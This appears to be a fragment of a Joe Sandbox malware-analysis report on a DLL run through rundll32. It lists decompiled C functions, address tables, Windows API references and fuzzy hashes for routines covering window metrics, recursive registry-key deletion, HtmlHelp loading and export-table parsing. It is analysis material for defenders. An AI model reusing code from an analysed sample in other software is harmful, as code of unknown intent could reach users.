                                                                                                        0x1000d8d4
                                                                                                        0x1000d8d5
                                                                                                        0x1000d8d6
                                                                                                        0x1000d8d7
                                                                                                        0x1000d8de
                                                                                                        0x1000d8e1
                                                                                                        0x1000d8e5
                                                                                                        0x1000d8f4
                                                                                                        0x1000d8f9
                                                                                                        0x1000d8fc
                                                                                                        0x00000000
                                                                                                        0x1000d8fc
                                                                                                        0x1000d89e
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000D8AD
                                                                                                        • GetSystemMetrics.USER32 ref: 1000D8C5
                                                                                                        • GetSystemMetrics.USER32 ref: 1000D8CC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: System$Metrics$InfoParameters
                                                                                                        • String ID: B$DISPLAY
                                                                                                        • API String ID: 3136151823-3316187204
                                                                                                        • Opcode ID: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
                                                                                                        • Instruction ID: 9954a119ce47e65a3950f6e4b3e830268b9633322f26d87d987c4675ad6ec402
                                                                                                        • Opcode Fuzzy Hash: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
                                                                                                        • Instruction Fuzzy Hash: 7C118F71600328ABEB11EF649C84B9F7EA8EF057D0B108066FD09AA14AD6719951CBF0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000C570(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
                                                                                                        				void* __edi;
                                                                                                        				struct HWND__* _t10;
                                                                                                        				struct HWND__* _t12;
                                                                                                        				struct HWND__* _t14;
                                                                                                        				struct HWND__* _t15;
                                                                                                        				int _t19;
                                                                                                        				void* _t21;
                                                                                                        				void* _t25;
                                                                                                        				struct HWND__** _t26;
                                                                                                        				void* _t27;
                                                                                                        
                                                                                                        				_t25 = __edx;
                                                                                                        				_t21 = __ebx;
                                                                                                        				_t26 = _a4;
                                                                                                        				_t27 = __ecx;
                                                                                                        				if(E1000DFD6(__ecx, __eflags, _t26) == 0) {
                                                                                                        					_t10 = E1001040B(__ecx);
                                                                                                        					__eflags = _t10;
                                                                                                        					if(_t10 == 0) {
                                                                                                        						L5:
                                                                                                        						__eflags = _t26[1] - 0x100;
                                                                                                        						if(_t26[1] != 0x100) {
                                                                                                        							L13:
                                                                                                        							return E1000E426(_t26);
                                                                                                        						}
                                                                                                        						_t12 = _t26[2];
                                                                                                        						__eflags = _t12 - 0x1b;
                                                                                                        						if(_t12 == 0x1b) {
                                                                                                        							L8:
                                                                                                        							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								goto L13;
                                                                                                        							}
                                                                                                        							_t14 = E100140D6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
                                                                                                        							__eflags = _t14;
                                                                                                        							if(_t14 == 0) {
                                                                                                        								goto L13;
                                                                                                        							}
                                                                                                        							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
                                                                                                        							__eflags = _t15;
                                                                                                        							if(_t15 == 0) {
                                                                                                        								L12:
                                                                                                        								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							_t19 = IsWindowEnabled(_t15);
                                                                                                        							__eflags = _t19;
                                                                                                        							if(_t19 == 0) {
                                                                                                        								goto L13;
                                                                                                        							}
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        						__eflags = _t12 - 3;
                                                                                                        						if(_t12 != 3) {
                                                                                                        							goto L13;
                                                                                                        						}
                                                                                                        						goto L8;
                                                                                                        					}
                                                                                                        					__eflags =  *(_t10 + 0x68);
                                                                                                        					if( *(_t10 + 0x68) == 0) {
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				L1:
                                                                                                        				return 1;
                                                                                                        			}













                                                                                                        0x1000c570
                                                                                                        0x1000c570
                                                                                                        0x1000c572
                                                                                                        0x1000c577
                                                                                                        0x1000c580
                                                                                                        0x1000c589
                                                                                                        0x1000c58e
                                                                                                        0x1000c590
                                                                                                        0x1000c59c
                                                                                                        0x1000c59c
                                                                                                        0x1000c5a3
                                                                                                        0x1000c5fe
                                                                                                        0x00000000
                                                                                                        0x1000c601
                                                                                                        0x1000c5a5
                                                                                                        0x1000c5a8
                                                                                                        0x1000c5ab
                                                                                                        0x1000c5b2
                                                                                                        0x1000c5bc
                                                                                                        0x1000c5be
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c5c7
                                                                                                        0x1000c5cc
                                                                                                        0x1000c5ce
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c5d5
                                                                                                        0x1000c5db
                                                                                                        0x1000c5dd
                                                                                                        0x1000c5ea
                                                                                                        0x1000c5f6
                                                                                                        0x00000000
                                                                                                        0x1000c5f6
                                                                                                        0x1000c5e0
                                                                                                        0x1000c5e6
                                                                                                        0x1000c5e8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c5e8
                                                                                                        0x1000c5ad
                                                                                                        0x1000c5b0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c5b0
                                                                                                        0x1000c592
                                                                                                        0x1000c596
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c598
                                                                                                        0x1000c582
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Edit
                                                                                                        • API String ID: 0-554135844
                                                                                                        • Opcode ID: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
                                                                                                        • Instruction ID: c36f5ccd8b34139a66e87801a9a5321a409f351d494de0105f07b228c10d2adb
                                                                                                        • Opcode Fuzzy Hash: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
                                                                                                        • Instruction Fuzzy Hash: F4015E3820070AA7FA65DB258D45F5AB6E5EF056D2F214429F942F10B8CFB0FD91D560
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1000BC89(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t25;
                                                                                                        				signed int _t30;
                                                                                                        				void* _t32;
                                                                                                        				signed int _t34;
                                                                                                        				signed int _t42;
                                                                                                        				void* _t43;
                                                                                                        				void* _t44;
                                                                                                        				char** _t54;
                                                                                                        				void* _t55;
                                                                                                        				void* _t58;
                                                                                                        				char* _t59;
                                                                                                        				void* _t61;
                                                                                                        
                                                                                                        				_t42 = __ebx;
                                                                                                        				_t59 = _t61 - 0x104;
                                                                                                        				_t25 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_t59[0x108] = _t25 ^ _t59;
                                                                                                        				_push(0x18);
                                                                                                        				E10017BF4(E10027F23, __ebx, __edi, __esi);
                                                                                                        				_t54 = _t59[0x118];
                                                                                                        				_t44 = _t59[0x114];
                                                                                                        				_t52 = _t59 - 0x18;
                                                                                                        				 *(_t59 - 0x20) = _t44;
                                                                                                        				 *(_t59 - 0x1c) = _t54;
                                                                                                        				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
                                                                                                        				_t57 = _t30;
                                                                                                        				if(_t30 == 0) {
                                                                                                        					while(1) {
                                                                                                        						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
                                                                                                        						_t57 = _t34;
                                                                                                        						_t66 = _t57;
                                                                                                        						if(_t57 != 0) {
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
                                                                                                        						_push(_t59);
                                                                                                        						E10009FA3(_t42, _t59 - 0x14, _t54, _t57, _t66);
                                                                                                        						 *(_t59 - 4) = 1;
                                                                                                        						_t57 = E1000BC89(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
                                                                                                        						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
                                                                                                        						 *(_t59 - 4) = 0;
                                                                                                        						E10009CB7( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
                                                                                                        						if(_t42 == 0) {
                                                                                                        							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					__eflags = _t57 - 0x103;
                                                                                                        					if(_t57 == 0x103) {
                                                                                                        						L6:
                                                                                                        						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
                                                                                                        					} else {
                                                                                                        						__eflags = _t57 - 0x3f2;
                                                                                                        						if(_t57 == 0x3f2) {
                                                                                                        							goto L6;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					RegCloseKey( *(_t59 - 0x18));
                                                                                                        				}
                                                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
                                                                                                        				_pop(_t55);
                                                                                                        				_pop(_t58);
                                                                                                        				_pop(_t43);
                                                                                                        				_t32 = E100167D5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
                                                                                                        				__eflags =  &(_t59[0x10c]);
                                                                                                        				return _t32;
                                                                                                        			}
















                                                                                                        0x1000bc89
                                                                                                        0x1000bc90
                                                                                                        0x1000bc94
                                                                                                        0x1000bc9b
                                                                                                        0x1000bca1
                                                                                                        0x1000bca8
                                                                                                        0x1000bcad
                                                                                                        0x1000bcb5
                                                                                                        0x1000bcbb
                                                                                                        0x1000bcc1
                                                                                                        0x1000bcc4
                                                                                                        0x1000bcc7
                                                                                                        0x1000bccd
                                                                                                        0x1000bcd1
                                                                                                        0x1000bcd7
                                                                                                        0x1000bce5
                                                                                                        0x1000bceb
                                                                                                        0x1000bced
                                                                                                        0x1000bcef
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000bcf1
                                                                                                        0x1000bcf7
                                                                                                        0x1000bcfb
                                                                                                        0x1000bd07
                                                                                                        0x1000bd13
                                                                                                        0x1000bd17
                                                                                                        0x1000bd1d
                                                                                                        0x1000bd21
                                                                                                        0x1000bd28
                                                                                                        0x1000bd2a
                                                                                                        0x00000000
                                                                                                        0x1000bd2a
                                                                                                        0x00000000
                                                                                                        0x1000bd28
                                                                                                        0x1000bd4b
                                                                                                        0x1000bd51
                                                                                                        0x1000bd5b
                                                                                                        0x1000bd66
                                                                                                        0x1000bd53
                                                                                                        0x1000bd53
                                                                                                        0x1000bd59
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000bd59
                                                                                                        0x1000bd6b
                                                                                                        0x1000bd6b
                                                                                                        0x1000bd76
                                                                                                        0x1000bd7e
                                                                                                        0x1000bd7f
                                                                                                        0x1000bd80
                                                                                                        0x1000bd89
                                                                                                        0x1000bd8e
                                                                                                        0x1000bd95

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 1000BCA8
                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1000BCC7
                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BCE5
                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 1000BD60
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1000BD6B
                                                                                                          • Part of subcall function 10009FA3: __EH_prolog3.LIBCMT ref: 10009FAA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 301487041-0
                                                                                                        • Opcode ID: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
                                                                                                        • Instruction ID: 653bf45c983c6aa9a2c45ec2c29e65d920d70d1e6a7a13c67c9db93679124605
                                                                                                        • Opcode Fuzzy Hash: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
                                                                                                        • Instruction Fuzzy Hash: 0921A075D0465A9FEB21DF94CC81AEDB7B0FF04390F104126ED55A7290EB705E44DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E10013F9E(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v263;
                                                                                                        				char _v264;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t9;
                                                                                                        				struct HWND__* _t21;
                                                                                                        				void* _t22;
                                                                                                        				intOrPtr _t25;
                                                                                                        				void* _t26;
                                                                                                        				int _t27;
                                                                                                        				CHAR* _t28;
                                                                                                        				signed int _t29;
                                                                                                        
                                                                                                        				_t25 = __edx;
                                                                                                        				_t22 = __ecx;
                                                                                                        				_t9 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_v8 = _t9 ^ _t29;
                                                                                                        				_t21 = _a4;
                                                                                                        				_t32 = _t21;
                                                                                                        				_t28 = _a8;
                                                                                                        				if(_t21 == 0) {
                                                                                                        					L1:
                                                                                                        					E1000A0DB(_t21, _t22, _t26, _t28, _t32);
                                                                                                        				}
                                                                                                        				if(_t28 == 0) {
                                                                                                        					goto L1;
                                                                                                        				}
                                                                                                        				_t27 = lstrlenA(_t28);
                                                                                                        				_v264 = 0;
                                                                                                        				E100174D0(_t27,  &_v263, 0, 0xff);
                                                                                                        				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
                                                                                                        					_t16 = SetWindowTextA(_t21, _t28);
                                                                                                        				}
                                                                                                        				return E100167D5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
                                                                                                        			}


















                                                                                                        0x10013f9e
                                                                                                        0x10013f9e
                                                                                                        0x10013fa7
                                                                                                        0x10013fae
                                                                                                        0x10013fb2
                                                                                                        0x10013fb5
                                                                                                        0x10013fb8
                                                                                                        0x10013fbc
                                                                                                        0x10013fbe
                                                                                                        0x10013fbe
                                                                                                        0x10013fbe
                                                                                                        0x10013fc5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013fd3
                                                                                                        0x10013fde
                                                                                                        0x10013fe5
                                                                                                        0x10013ff4
                                                                                                        0x1001401d
                                                                                                        0x1001401d
                                                                                                        0x10014031

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 10013FC8
                                                                                                        • _memset.LIBCMT ref: 10013FE5
                                                                                                        • GetWindowTextA.USER32 ref: 10013FFF
                                                                                                        • lstrcmpA.KERNEL32(00000000,?), ref: 10014011
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 1001401D
                                                                                                          • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4273134663-0
                                                                                                        • Opcode ID: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
                                                                                                        • Instruction ID: fa7108181993de9b8ea87dd6eaa7291c2451852d429ff63cadea9d36e3b3e8b2
                                                                                                        • Opcode Fuzzy Hash: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
                                                                                                        • Instruction Fuzzy Hash: 3901C0B6A00228ABE711DB65DCC4FDF77ACEF18790F110065EA45D7141DA70DE848BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 90%
                                                                                                        			E10010C0F(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                        				intOrPtr _v0;
                                                                                                        				intOrPtr _v4;
                                                                                                        				void* __esi;
                                                                                                        				struct HINSTANCE__* _t16;
                                                                                                        				_Unknown_base(*)()* _t17;
                                                                                                        				void* _t25;
                                                                                                        				void* _t26;
                                                                                                        				void* _t28;
                                                                                                        
                                                                                                        				_t28 = __eflags;
                                                                                                        				_t24 = __edi;
                                                                                                        				_t21 = __ebx;
                                                                                                        				E1001431B(__ebx, _t25, __ebp, 0xc);
                                                                                                        				_push(E100100DE);
                                                                                                        				_t26 = E100139F5(__ebx, 0x1005a8e0, __edi, _t25, _t28);
                                                                                                        				_t29 = _t26;
                                                                                                        				if(_t26 == 0) {
                                                                                                        					E1000A0DB(_t21, 0x1005a8e0, __edi, _t26, _t29);
                                                                                                        				}
                                                                                                        				_t30 =  *(_t26 + 8);
                                                                                                        				if( *(_t26 + 8) != 0) {
                                                                                                        					L7:
                                                                                                        					E10014388(0xc);
                                                                                                        					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
                                                                                                        				} else {
                                                                                                        					_push("hhctrl.ocx");
                                                                                                        					_t16 = E1000E725(_t21, 0x1005a8e0, _t24, _t26, _t30);
                                                                                                        					 *(_t26 + 4) = _t16;
                                                                                                        					if(_t16 != 0) {
                                                                                                        						_t17 = GetProcAddress(_t16, "HtmlHelpA");
                                                                                                        						__eflags = _t17;
                                                                                                        						 *(_t26 + 8) = _t17;
                                                                                                        						if(_t17 != 0) {
                                                                                                        							goto L7;
                                                                                                        						}
                                                                                                        						FreeLibrary( *(_t26 + 4));
                                                                                                        						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                                                                                                        					}
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}











                                                                                                        0x10010c0f
                                                                                                        0x10010c0f
                                                                                                        0x10010c0f
                                                                                                        0x10010c12
                                                                                                        0x10010c17
                                                                                                        0x10010c26
                                                                                                        0x10010c28
                                                                                                        0x10010c2a
                                                                                                        0x10010c2c
                                                                                                        0x10010c2c
                                                                                                        0x10010c31
                                                                                                        0x10010c35
                                                                                                        0x10010c6f
                                                                                                        0x10010c71
                                                                                                        0x00000000
                                                                                                        0x10010c37
                                                                                                        0x10010c37
                                                                                                        0x10010c3c
                                                                                                        0x10010c44
                                                                                                        0x10010c47
                                                                                                        0x10010c53
                                                                                                        0x10010c59
                                                                                                        0x10010c5b
                                                                                                        0x10010c5e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010c63
                                                                                                        0x10010c69
                                                                                                        0x10010c69
                                                                                                        0x00000000
                                                                                                        0x10010c49

                                                                                                        APIs
                                                                                                          • Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
                                                                                                          • Part of subcall function 1001431B: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
                                                                                                          • Part of subcall function 1001431B: LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
                                                                                                          • Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F
                                                                                                          • Part of subcall function 100139F5: __EH_prolog3_catch.LIBCMT ref: 100139FC
                                                                                                          • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                        • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 10010C53
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 10010C63
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                        • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                        • API String ID: 2853499158-63838506
                                                                                                        • Opcode ID: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
                                                                                                        • Instruction ID: 8873b40b3358b87e9332ca8c9146562190e137befea279647b799a71fcd87530
                                                                                                        • Opcode Fuzzy Hash: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
                                                                                                        • Instruction Fuzzy Hash: 7001F431204303DFE321DFA1DE05B4A76E0EF05781F018A08F4DAA8061DBB1D8D0DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E100224E9() {
                                                                                                        				signed long long _v12;
                                                                                                        				signed int _v20;
                                                                                                        				signed long long _v28;
                                                                                                        				signed char _t8;
                                                                                                        
                                                                                                        				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                        				if(_t8 == 0) {
                                                                                                        					L6:
                                                                                                        					_v20 =  *0x1002bb98;
                                                                                                        					_v28 =  *0x1002bb90;
                                                                                                        					asm("fsubr qword [ebp-0x18]");
                                                                                                        					_v12 = _v28 / _v20 * _v20;
                                                                                                        					asm("fld1");
                                                                                                        					asm("fcomp qword [ebp-0x8]");
                                                                                                        					asm("fnstsw ax");
                                                                                                        					if((_t8 & 0x00000005) != 0) {
                                                                                                        						return 0;
                                                                                                        					} else {
                                                                                                        						return 1;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                        					if(__eax == 0) {
                                                                                                        						goto L6;
                                                                                                        					} else {
                                                                                                        						_push(0);
                                                                                                        						return __eax;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}







                                                                                                        0x100224ee
                                                                                                        0x100224f6
                                                                                                        0x1002250d
                                                                                                        0x100224b9
                                                                                                        0x100224c2
                                                                                                        0x100224ce
                                                                                                        0x100224d1
                                                                                                        0x100224d4
                                                                                                        0x100224d6
                                                                                                        0x100224d9
                                                                                                        0x100224de
                                                                                                        0x100224e8
                                                                                                        0x100224e0
                                                                                                        0x100224e4
                                                                                                        0x100224e4
                                                                                                        0x100224f8
                                                                                                        0x100224fe
                                                                                                        0x10022506
                                                                                                        0x00000000
                                                                                                        0x10022508
                                                                                                        0x10022508
                                                                                                        0x1002250c
                                                                                                        0x1002250c
                                                                                                        0x10022506

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,1001A130), ref: 100224EE
                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 100224FE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                        • Opcode ID: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
                                                                                                        • Instruction ID: b1380c49f8d15cda8b98f9f56e3724ed638b8beb480886d8724856f67b077174
                                                                                                        • Opcode Fuzzy Hash: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
                                                                                                        • Instruction Fuzzy Hash: EDF03030900D1EE2EF00ABE1BC596AF7A78FB44785FD20490E681B0088DF7181718681
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10002D50(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				signed int _v12;
                                                                                                        				intOrPtr* _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr* _v32;
                                                                                                        				signed short* _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				void* _t79;
                                                                                                        				void* _t119;
                                                                                                        
                                                                                                        				_v40 = __ecx;
                                                                                                        				_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                                        				_v12 = 0;
                                                                                                        				_v16 =  *_a4 + 0x78;
                                                                                                        				if( *((intOrPtr*)(_v16 + 4)) != 0) {
                                                                                                        					_v8 = _v20 +  *_v16;
